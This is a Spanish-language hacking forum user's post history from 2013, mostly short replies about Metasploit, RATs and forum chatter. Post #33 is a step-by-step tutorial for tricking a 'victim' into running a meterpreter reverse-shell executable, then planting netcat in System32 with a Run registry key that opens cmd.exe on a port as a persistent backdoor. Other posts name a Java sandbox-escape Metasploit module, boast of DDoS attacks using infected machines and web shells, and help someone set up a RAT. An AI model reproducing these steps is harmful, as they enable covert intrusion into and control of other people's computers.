Gracias, sobre todo los las fuentes!
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#22
Cursos, manuales y libros / Re:Ciberputead@res en Internet
Septiembre 27, 2013, 03:36:14 PM
Hostia, ¿pero esto es un manual o un libro?
#23
Cursos, manuales y libros / Re:Ciberputead@res en Internet
Septiembre 27, 2013, 03:15:21 PM
LOL no me gustaría conocer en persona al escritor de eso o.O
PD: Uno de los apartados se llama: Lenguaje explicito,brutal y soez
jajajajjajajajaj
PD: Uno de los apartados se llama: Lenguaje explicito,brutal y soez
jajajajjajajajaj
#24
Bugs y Exploits / Bug en Java 7
Septiembre 26, 2013, 06:14:04 PM
Java storeImageArray Vulnerability
Este módulo abusa de una Vulnerabilidad de Indexado de un Arreglo Inválido en la función estática storeImageArray() que causa una corrupción en memoria saltándose el Sandbox de Java. La vulnerabilidad afecta a Java versiones 7 update 21 y anteriores, Java versiones 6 update 45 y anteriores. El bug es vigente tanto en sistemas que corren Windows como Linux.
Exploit: exploit/multi/browser/java_storeimagearray
Vídeo de demostracion:
Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Este módulo abusa de una Vulnerabilidad de Indexado de un Arreglo Inválido en la función estática storeImageArray() que causa una corrupción en memoria saltándose el Sandbox de Java. La vulnerabilidad afecta a Java versiones 7 update 21 y anteriores, Java versiones 6 update 45 y anteriores. El bug es vigente tanto en sistemas que corren Windows como Linux.
Exploit: exploit/multi/browser/java_storeimagearray
Vídeo de demostracion:
Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
#25
Off Topic / Re:Post Nº 100!!!!
Septiembre 26, 2013, 03:15:27 PM
Jajajajaja felicidades crazy 
a mi todabía me quedan unos meses para llegar a 100 
a mi todabía me quedan unos meses para llegar a 100
#26
Dudas y pedidos generales / Re:backtrack metasploit
Septiembre 25, 2013, 04:05:02 PM
Pues realmente no lo se, debe de ser parecido, busca en configuraciones
#27
Dudas y pedidos generales / Re:backtrack metasploit
Septiembre 25, 2013, 03:04:35 PM
¿Maquina virtual? No se si es eso, es que pueden muchos tipos de problemas
Y asegurate de tener el puerto abierto
Y asegurate de tener el puerto abierto
#28
Hacking / Re:Como crear backdoors en metasploit.[Algunos tipos]
Septiembre 25, 2013, 11:39:17 AM
Abre los puertos pelumon, y te tiene que ir si o si, a no ser, que metasploit lo tengas en una maquina virtual, entonces:
#29
Off Topic / Re:Feliz Cumpleaños ANTRAX
Septiembre 24, 2013, 01:48:05 PM
Vengaaa feliz cumpleaños Antrax!!!
#30
Underc0de / Re:Reto Oficial #2 - El rey de la Colina - Anotate!
Septiembre 22, 2013, 05:08:17 AM
Me apunto, por intentarlo que no falte
#31
Bugs y Exploits / Re:Metasploit + meterpreter + nc backdoor
Septiembre 20, 2013, 09:46:03 AM
Muchas gracias ZanGetsu 
La verdad que estaba un poco amontonado
La verdad que estaba un poco amontonado
#32
Bugs y Exploits / Re:Metasploit + meterpreter + nc backdoor
Septiembre 18, 2013, 06:56:41 PM
Bueno primero lo siendo, mañana si puedo lo cambiaré y deberías mirar el brillo de tu pantalla por que para mi es legible totalmente o.O
#33
Bugs y Exploits / Metasploit + meterpreter + nc backdoor
Septiembre 18, 2013, 05:37:13 PM
Antes que todo aclarar que este post es para Newbie (lo explico bien por eso)
Vale, empecemos; primero abrimos la consola y generamos un .exe con msfpayload
msfpayload windows/meterpreter/reverse_tcp lhost=tu ip pública lport=el puerto X > /root/Desktop/payload.exe
vale, ahora para mayor comodidad arrancaremos apache, y subiéremos el .exe.
A continuación pondremos a escuchar meterpreter, por lo que abrimos metasploit, seleccionamos el exploit
use exploit/multi/handler,
en este caso usaré este payload, si vosotros encontráis alguno mejor podéis usarlo
set payload windows/meterpreter/reverse_tcp ahora marcamos el puerto y el host con:
set lhost (y tu ip o no-ip) y set lport ( y el puerto) vale,
ahora le damos run con exploit -j Ok,
respecto a apache, abrimos el puerto 80, por que utilizaremos el no-ip como url para enviar el "troyano", una vez que tengamos meterpreter escuchando podemos pasarle la url a la víctima, por ejemplo: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login (ya que es el nombre que le dimos anteriormente) una vez que nos aseguramos de que la víctima ha descargado el archivo y lo ha ejecutado, nos saldrá en la consola que se ha habierto una sesión, ponemos; sessions -i 1
Ahora para asegurarnos la víctima, le subiremos netcat (nc) con; upload /pentest/windows-binaries/tools/nc.exe C:\\Windows\\System32\\nc.exe en ese "código" hemos seleccionado nuestra ruta local, y la ruta de la víctima, ahora le añadiremos al registro
netcat; reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RUN -v Backdoor -d C:\\Windows\\System32\\nc.exe" -L -d -p (un puerto diferente a el anterior ej: 4447) -e cmd.exe" vale, ahora subiremos el mismo "troyano" (para poder ejecutarlo con netcat, ya que solo tenemos acceso a la consola)con; upload /root/Desktop/payload.exe C:\\Windows\\System32\\payload.exe
Y yá esta, ahora guardaremos su ip en un txt, y cuando queramos conectarnos pondremos; nc (su ip) 4447 (que es el puerto)
Perdón si hice algo mal, no dudéis en comentarlo y si tenéis una duda igual...
Vale, empecemos; primero abrimos la consola y generamos un .exe con msfpayload
msfpayload windows/meterpreter/reverse_tcp lhost=tu ip pública lport=el puerto X > /root/Desktop/payload.exe
vale, ahora para mayor comodidad arrancaremos apache, y subiéremos el .exe.
A continuación pondremos a escuchar meterpreter, por lo que abrimos metasploit, seleccionamos el exploit
use exploit/multi/handler,
en este caso usaré este payload, si vosotros encontráis alguno mejor podéis usarlo
set payload windows/meterpreter/reverse_tcp ahora marcamos el puerto y el host con:
set lhost (y tu ip o no-ip) y set lport ( y el puerto) vale,
ahora le damos run con exploit -j Ok,
respecto a apache, abrimos el puerto 80, por que utilizaremos el no-ip como url para enviar el "troyano", una vez que tengamos meterpreter escuchando podemos pasarle la url a la víctima, por ejemplo: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login (ya que es el nombre que le dimos anteriormente) una vez que nos aseguramos de que la víctima ha descargado el archivo y lo ha ejecutado, nos saldrá en la consola que se ha habierto una sesión, ponemos; sessions -i 1
Ahora para asegurarnos la víctima, le subiremos netcat (nc) con; upload /pentest/windows-binaries/tools/nc.exe C:\\Windows\\System32\\nc.exe en ese "código" hemos seleccionado nuestra ruta local, y la ruta de la víctima, ahora le añadiremos al registro
netcat; reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RUN -v Backdoor -d C:\\Windows\\System32\\nc.exe" -L -d -p (un puerto diferente a el anterior ej: 4447) -e cmd.exe" vale, ahora subiremos el mismo "troyano" (para poder ejecutarlo con netcat, ya que solo tenemos acceso a la consola)con; upload /root/Desktop/payload.exe C:\\Windows\\System32\\payload.exe
Y yá esta, ahora guardaremos su ip en un txt, y cuando queramos conectarnos pondremos; nc (su ip) 4447 (que es el puerto)
Perdón si hice algo mal, no dudéis en comentarlo y si tenéis una duda igual...
#34
Dudas y pedidos generales / Re:No-ip mas Metasploit
Septiembre 18, 2013, 01:36:26 PM
Si el ataque lo estas intentando hacer desde una máquina virtual, debes tener esto así:
#35
Dudas y pedidos generales / Re:"¿Se puede?"
Septiembre 15, 2013, 07:07:15 AM
No, pero no hacia preguntas tan absurdas.
Mas que nada por que antes de ello me informaba sobre el tema, buscaba por mi cuenta, y si no lo encontraba, entonces pedía ayuda.
Mas que nada por que antes de ello me informaba sobre el tema, buscaba por mi cuenta, y si no lo encontraba, entonces pedía ayuda.
#36
Dudas y pedidos generales / Re:"¿Se puede?"
Septiembre 14, 2013, 07:40:47 PM
.--------. Hay muchas extensiones, no hace falta que sea .bat, y si quieres hacer lo que estoy pensando deberías plantearte que hacer con eso algo mejor
#37
Dudas y pedidos generales / Re:DDOS Potenciado
Septiembre 14, 2013, 04:48:39 PM
La verdad que he tenido booters y no hacían nada, yo creo que es mas eficiente el ipkiller, con 3 infectados he llegado a tumbar una pagina mediocre,y con 47 shells activas y unas 20 en buenos servidores e incluso 1 en una web de hosting, no conseguí hacer nada, ni tumbar una conexión de 5mb
#38
Off Topic / Re:Algún español que asista a la PyCon España 2013?
Septiembre 12, 2013, 12:30:51 PM
Yo iría, pero me sale demasiado caro D:
#39
Dudas y pedidos generales / Re:Ayuda Spy-net
Septiembre 12, 2013, 07:02:50 AM
.-. Ganaoz, no se si esto es una tomadura de pelo, en vez de andar pidiendo ayuda, You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login ''para qe se conecte solo cuando reinician o apagan y esas cosas!'' ¿Es una broma o que?
#40
Dudas y pedidos generales / Re:Ayuda Spy-net
Septiembre 11, 2013, 04:12:47 PM
Aquí no hay vuelta de hoja, si no te va con la ip privada tiene que ser tu cliente el que este mal .-. prueba con otro rat y nos comentas luego si te va
